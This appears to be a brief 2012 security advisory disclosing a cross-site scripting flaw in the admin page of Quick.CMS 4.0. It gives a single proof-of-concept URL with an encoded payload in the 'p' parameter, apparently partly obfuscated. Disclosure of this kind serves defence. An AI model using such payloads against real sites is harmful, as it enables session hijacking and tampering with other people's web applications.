Quick.CMS version 4.0 suffers from a cross site scripting vulnerability.
9c1ec2b7657ec76cff5acd9c6c321baf71a70f51a8e113e3dc5cadc5da70d4f6
# TITLE ....... # Quick.Cms_v4.0 XSS-over-GET ..................................... #
# DATE ........ # 18.03.2012 .......................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ......................... #
# SOFT LINK ... # http://opensolution.org/ ................................. #
# VERSION ..... # 4.0 ............................................... #
# TESTED ON ... # LAMP ................................................ #
# ..................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
Cross-site scripting.
#............................................#
# 3. Where is bug :)
http://Quick.Cms_v4.0/admin/?p=[url%3d%22%29%3b%happy.3friends:x+s+s:)[%2furl]
#............................................#
# 4. More...
- http://hauntit.blogspot.com
- http://opensolution.org/
- http://www.google.com
- http://portswigger.net
#............................................#
# Best regards
#